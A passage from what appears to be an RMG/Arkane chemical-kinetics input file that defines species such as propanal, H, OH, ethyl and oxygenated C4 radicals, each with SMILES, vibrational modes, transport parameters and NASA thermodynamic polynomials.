    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.89836,-0.00355878,3.55205e-05,-4.385e-08,1.71078e-11,-46778.6,7.34954], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.61383,0.00644964,-2.29083e-06,3.6716e-10,-2.18737e-14,-45330.3,0.847884], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-389.211,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(103.931,'J/(mol*K)'), label="""HOCHO""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
# Species 'C2H5CHO(70)' (labelled propanal in its thermo entry) — thermo from the DFT_QCI_thermo library.
species(
    label = 'C2H5CHO(70)',
    structure = SMILES('CCC=O'),
    E0 = (-204.33,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2782.5,750,1395,475,1775,1000],'cm^-1')),
        HinderedRotor(inertia=(0.207559,'amu*angstrom^2'), symmetry=1, barrier=(4.77219,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.208362,'amu*angstrom^2'), symmetry=1, barrier=(4.79065,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (58.0791,'amu'),
    collisionModel = TransportData(shapeIndex=2, epsilon=(3133.67,'J/mol'), sigma=(5.35118,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=489.47 K, Pc=46.4 bar (from Joback method)"""),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.90578,0.0240644,-7.06356e-06,-9.81837e-10,5.55825e-13,-24535.9,13.5806], Tmin=(100,'K'), Tmax=(1712.49,'K')), NASAPolynomial(coeffs=[7.69109,0.0189242,-7.84934e-06,1.38273e-09,-8.99057e-14,-27060.1,-14.6647], Tmin=(1712.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-204.33,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(224.491,'J/(mol*K)'), label="""propanal""", comment="""Thermo library: DFT_QCI_thermo"""),
)
# Species 'H(3)' (hydrogen atom per its SMILES [H]) — no modes block; thermo from the BurkeH2O2 library.
species(
    label = 'H(3)',
    structure = SMILES('[H]'),
    E0 = (211.792,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (1.00794,'amu'),
    collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25472.7,-0.459566], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""),
)
# Species 'CCC(=O)C([O])O(11574)' — thermo estimated by group additivity (see NASA comment field).
species(
    label = 'CCC(=O)C([O])O(11574)',
    structure = SMILES('CCC(=O)C([O])O'),
    E0 = (-374.366,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,375,552.5,462.5,1710,3615,1277.5,1000,1380,1390,370,380,2900,435,214.497,1592.09,4000],'cm^-1')),
        HinderedRotor(inertia=(0.00366396,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.310634,'amu*angstrom^2'), symmetry=1, barrier=(10.1426,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.310642,'amu*angstrom^2'), symmetry=1, barrier=(10.1426,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.310674,'amu*angstrom^2'), symmetry=1, barrier=(10.1427,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 2,
    opticalIsomers = 1,
    molecularWeight = (103.097,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.06367,0.0702375,-9.47739e-05,7.96619e-08,-2.77969e-11,-44925.5,28.1307], Tmin=(100,'K'), Tmax=(787.846,'K')), NASAPolynomial(coeffs=[6.58624,0.0357236,-1.67338e-05,3.19334e-09,-2.21563e-13,-45594.7,4.07975], Tmin=(787.846,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-374.366,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-(Cds-O2d)CsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + group(Cds-OdCsCs) + radical(C=OCOJ)"""),
)
# Species 'CCC([O])C(=O)O(11575)' — thermo estimated by group additivity (see NASA comment field).
species(
    label = 'CCC([O])C(=O)O(11575)',
    structure = SMILES('CCC([O])C(=O)O'),
    E0 = (-418.938,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1277.5,1000,1380,1390,370,380,2900,435,200,800,960,1120,1280,1440,1600],'cm^-1')),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 2,
    opticalIsomers = 1,
    molecularWeight = (103.097,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.27686,0.0510586,-2.34839e-05,-3.16965e-09,3.93642e-12,-50281.2,28.3171], Tmin=(100,'K'), Tmax=(1106.01,'K')), NASAPolynomial(coeffs=[12.5671,0.0259515,-1.076e-05,2.01596e-09,-1.41472e-13,-53740.4,-31.6377], Tmin=(1106.01,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-418.938,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-(Cds-O2d)H) + group(Cs-(Cds-O2d)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs) + radical(C=OCOJ)"""),
)
# Species 'C2H5(29)' (ethyl radical per its SMILES C[CH2]) — thermo from the Klippenstein_Glarborg2016 library.
species(
    label = 'C2H5(29)',
    structure = SMILES('C[CH2]'),
    E0 = (107.874,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,1190.6,1642.82,1642.96,3622.23,3622.39],'cm^-1')),
        HinderedRotor(inertia=(0.866817,'amu*angstrom^2'), symmetry=1, barrier=(19.9298,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 2,
    opticalIsomers = 1,
    molecularWeight = (29.0611,'amu'),
    collisionModel = TransportData(shapeIndex=2, epsilon=(2097.75,'J/mol'), sigma=(4.302,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.5, comment="""GRI-Mech"""),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.24186,-0.00356905,4.82667e-05,-5.85401e-08,2.25805e-11,12969,4.44704], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.32196,0.0123931,-4.39681e-06,7.0352e-10,-4.18435e-14,12175.9,0.171104], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(107.874,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), label="""C2H5""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
# Species '[O]C(O)C=O(4774)' — thermo estimated by group additivity (see NASA comment field).
species(
    label = '[O]C(O)C=O(4774)',
    structure = SMILES('[O]C(O)C=O'),
    E0 = (-294.078,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2782.5,750,1395,475,1775,1000,3615,1277.5,1000,1380,1390,370,380,2900,435,3550.67],'cm^-1')),
        HinderedRotor(inertia=(0.0510999,'amu*angstrom^2'), symmetry=1, barrier=(2.09244,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.625001,'amu*angstrom^2'), symmetry=1, barrier=(14.37,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 2,
    opticalIsomers = 1,
    molecularWeight = (75.0434,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.73016,0.0299168,-2.84183e-05,1.57731e-08,-3.78628e-12,-35325.3,19.2328], Tmin=(100,'K'), Tmax=(971.508,'K')), NASAPolynomial(coeffs=[6.01114,0.0164081,-7.56104e-06,1.46047e-09,-1.03199e-13,-35962.9,3.49881], Tmin=(971.508,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-294.078,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(174.604,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsOsOsH) + group(Cds-OdCsH) + radical(C=OCOJ)"""),
)
# Species '[O][CH]O(171)' — triplet (spinMultiplicity=3); thermo estimated by group additivity.
species(
    label = '[O][CH]O(171)',
    structure = SMILES('[O][CH]O'),
    E0 = (5.37818,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3615,1277.5,1000,1989.68],'cm^-1')),
        HinderedRotor(inertia=(0.0937094,'amu*angstrom^2'), symmetry=1, barrier=(2.15456,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 3,
    opticalIsomers = 1,
    molecularWeight = (46.0254,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.40204,0.0209571,-4.96202e-05,5.95355e-08,-2.44634e-11,660.882,10.3084], Tmin=(100,'K'), Tmax=(868.739,'K')), NASAPolynomial(coeffs=[-0.343229,0.0179325,-9.40003e-06,1.81361e-09,-1.23835e-13,2076.48,32.2523], Tmin=(868.739,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(5.37818,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(103.931,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-OsOsHH) + radical(OCJO) + radical(OCOJ)"""),
)
# Species 'CC[CH][O](563)' — thermo from DFT_QCI_thermo library with radical corrections.
species(
    label = 'CC[CH][O](563)',
    structure = SMILES('CC[CH][O]'),
    E0 = (133.127,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,298.357,1774.23],'cm^-1')),
        HinderedRotor(inertia=(0.129074,'amu*angstrom^2'), symmetry=1, barrier=(8.14273,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.00364816,'amu*angstrom^2'), symmetry=1, barrier=(8.14268,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 3,
    opticalIsomers = 1,
    molecularWeight = (58.0791,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.1585,0.0245341,-8.42945e-06,1.83944e-10,2.32791e-13,16036.2,14.3859], Tmin=(100,'K'), Tmax=(2077.96,'K')), NASAPolynomial(coeffs=[11.8474,0.0146996,-6.30487e-06,1.09829e-09,-6.9226e-14,10937.4,-37.4679], Tmin=(2077.96,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(133.127,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo library: DFT_QCI_thermo + radical(CCOJ) + radical(CCsJOH)"""),
)
# Species 'OH(5)' (hydroxyl radical) — thermo from the BurkeH2O2 library; transport from GRI-Mech.
species(
    label = 'OH(5)',
    structure = SMILES('[OH]'),
    E0 = (28.372,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([3287.46],'cm^-1')),
    ],
    spinMultiplicity = 2,
    opticalIsomers = 1,
    molecularWeight = (17.0073,'amu'),
    collisionModel = TransportData(shapeIndex=1, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.4858,0.00133397,-4.70043e-06,5.64379e-09,-2.06318e-12,3411.96,1.99788], Tmin=(100,'K'), Tmax=(1005.25,'K')), NASAPolynomial(coeffs=[2.88225,0.00103869,-2.35652e-07,1.40229e-11,6.34581e-16,3669.56,5.59053], Tmin=(1005.25,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(28.372,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""OH""", comment="""Thermo library: BurkeH2O2"""),
)
# Species 'CCC([O])C=O(10833)' — thermo estimated by group additivity (see NASA comment field).
species(
    label = 'CCC([O])C=O(10833)',
    structure = SMILES('CCC([O])C=O'),
    E0 = (-153.252,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2782.5,750,1395,475,1775,1000,1380,1390,370,380,2900,435,2750,2800,2850,1350,1500,750,1050,1375,1000,728.565,4000],'cm^-1')),
        HinderedRotor(inertia=(0.0133711,'amu*angstrom^2'), symmetry=1, barrier=(4.98983,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.714663,'amu*angstrom^2'), symmetry=1, barrier=(16.4315,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.7158,'amu*angstrom^2'), symmetry=1, barrier=(16.4576,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 2,
    opticalIsomers = 1,
    molecularWeight = (87.0972,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.78185,0.0407275,-1.0197e-05,-1.25231e-08,6.72473e-12,-18345.2,25.1938], Tmin=(100,'K'), Tmax=(1058.66,'K')), NASAPolynomial(coeffs=[10.6252,0.0237944,-9.55575e-06,1.77796e-09,-1.24964e-13,-21141.2,-22.3363], Tmin=(1058.66,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-153.252,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(295.164,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsHH) + group(Cs-(Cds-O2d)CsOsH) + group(Cs-CsHHH) + group(Cds-OdCsH) + radical(C=OCOJ)"""),
)
# Species 'CC[C](O)C([O])O(11576)' — no modes block (thermo-only entry); group-additivity estimate.
species(
    label = 'CC[C](O)C([O])O(11576)',
    structure = SMILES('CC[C](O)C([O])O'),
    E0 = (-274.5,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.546778,0.0848678,-0.000130386,1.17084e-07,-4.16283e-11,-32899,30.5033], Tmin=(100,'K'), Tmax=(832.077,'K')), NASAPolynomial(coeffs=[6.40553,0.0399062,-1.90522e-05,3.62214e-09,-2.48933e-13,-33292.5,6.80931], Tmin=(832.077,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-274.5,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(C2CsJOH)"""),
)
# Species 'CCC([O])[C](O)O(11577)' — no modes block (thermo-only entry); group-additivity estimate.
species(
    label = 'CCC([O])[C](O)O(11577)',
    structure = SMILES('CCC([O])[C](O)O'),
    E0 = (-241.226,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.759501,0.072888,-7.5304e-05,4.23075e-08,-9.72939e-12,-28897.4,29.2657], Tmin=(100,'K'), Tmax=(1042.29,'K')), NASAPolynomial(coeffs=[12.0388,0.0296014,-1.30086e-05,2.46225e-09,-1.72257e-13,-31248.6,-25.6175], Tmin=(1042.29,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-241.226,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(Cs_P) + radical(CC(C)OJ)"""),
)
# Species 'C[CH]C(O)C([O])O(11578)' — triplet; five identical hindered rotors; group-additivity thermo.
species(
    label = 'C[CH]C(O)C([O])O(11578)',
    structure = SMILES('C[CH]C(O)C([O])O'),
    E0 = (-251.226,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2800,2850,1350,1500,750,1050,1375,1000,3580,3650,1210,1345,900,1100,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,211.525,836.048,1654.94],'cm^-1')),
        HinderedRotor(inertia=(0.136891,'amu*angstrom^2'), symmetry=1, barrier=(3.53514,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.136891,'amu*angstrom^2'), symmetry=1, barrier=(3.53514,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.136891,'amu*angstrom^2'), symmetry=1, barrier=(3.53514,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.136891,'amu*angstrom^2'), symmetry=1, barrier=(3.53514,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.136891,'amu*angstrom^2'), symmetry=1, barrier=(3.53514,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 3,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.14425,0.0677038,-7.203e-05,4.66356e-08,-1.30423e-11,-30116.9,31.4492], Tmin=(100,'K'), Tmax=(845.985,'K')), NASAPolynomial(coeffs=[7.70664,0.036676,-1.70161e-05,3.28341e-09,-2.31432e-13,-31227.3,0.886926], Tmin=(845.985,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-251.226,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CCJCO)"""),
)
# Species 'CCC(O)[C]([O])O(11579)' — no modes block (thermo-only entry); group-additivity estimate.
species(
    label = 'CCC(O)[C]([O])O(11579)',
    structure = SMILES('CCC(O)[C]([O])O'),
    E0 = (-245.881,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.39412,0.0668244,-5.35377e-05,-1.28134e-08,3.81293e-11,-29488.4,28.8506], Tmin=(100,'K'), Tmax=(512.589,'K')), NASAPolynomial(coeffs=[7.14669,0.0383248,-1.81032e-05,3.48272e-09,-2.43479e-13,-30293.4,2.84173], Tmin=(512.589,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-245.881,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(Cs_P)"""),
)
# Species 'CC[C]([O])C(O)O(11580)' — no modes block (thermo-only entry); group-additivity estimate.
species(
    label = 'CC[C]([O])C(O)O(11580)',
    structure = SMILES('CC[C]([O])C(O)O'),
    E0 = (-269.844,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.505983,0.0815695,-0.000104091,7.4982e-08,-2.20571e-11,-32333.2,28.9158], Tmin=(100,'K'), Tmax=(825.577,'K')), NASAPolynomial(coeffs=[10.6633,0.0323566,-1.46768e-05,2.77919e-09,-1.92929e-13,-34010.4,-18.1407], Tmin=(825.577,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-269.844,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CC(C)OJ) + radical(C2CsJOH)"""),
)
# Species 'C[CH]C([O])C(O)O(11581)' — no modes block (thermo-only entry); group-additivity estimate.
species(
    label = 'C[CH]C([O])C(O)O(11581)',
    structure = SMILES('C[CH]C([O])C(O)O'),
    E0 = (-246.57,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.729126,0.0692341,-6.45545e-05,3.16787e-08,-6.28084e-12,-29535.5,31.1768], Tmin=(100,'K'), Tmax=(1208.42,'K')), NASAPolynomial(coeffs=[13.8307,0.0258666,-1.07228e-05,1.98062e-09,-1.3685e-13,-32702,-34.5109], Tmin=(1208.42,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-246.57,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCJCO) + radical(CC(C)OJ)"""),
)
# Species '[CH2]CC(O)C([O])O(11582)' — triplet with five identical hindered rotors; group-additivity thermo.
species(
    label = '[CH2]CC(O)C([O])O(11582)',
    structure = SMILES('[CH2]CC(O)C([O])O'),
    E0 = (-245.881,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,3580,3650,1210,1345,900,1100,3000,3100,440,815,1455,1000,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,200,800,1600],'cm^-1')),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 3,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.39412,0.0668244,-5.35377e-05,-1.28134e-08,3.81293e-11,-29488.4,29.9493], Tmin=(100,'K'), Tmax=(512.589,'K')), NASAPolynomial(coeffs=[7.14669,0.0383248,-1.81032e-05,3.48272e-09,-2.43479e-13,-30293.4,3.94035], Tmin=(512.589,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-245.881,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(RCCJ)"""),
)
# Species 'CCC(O)C([O])[O](11583)' — no modes block (thermo-only entry); group-additivity estimate.
species(
    label = 'CCC(O)C([O])[O](11583)',
    structure = SMILES('CCC(O)C([O])[O]'),
    E0 = (-225.423,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.06955,0.0733406,-0.000105669,1.00457e-07,-3.86519e-11,-27015.2,29.3685], Tmin=(100,'K'), Tmax=(804.875,'K')), NASAPolynomial(coeffs=[2.87276,0.0466262,-2.27974e-05,4.41143e-09,-3.07546e-13,-26730.4,24.6327], Tmin=(804.875,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-225.423,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(340.893,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CCOJ)"""),
)
# Species '[CH2]CC([O])C(O)O(11584)' — no modes block (thermo-only entry); group-additivity estimate.
species(
    label = '[CH2]CC([O])C(O)O(11584)',
    structure = SMILES('[CH2]CC([O])C(O)O'),
    E0 = (-241.226,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
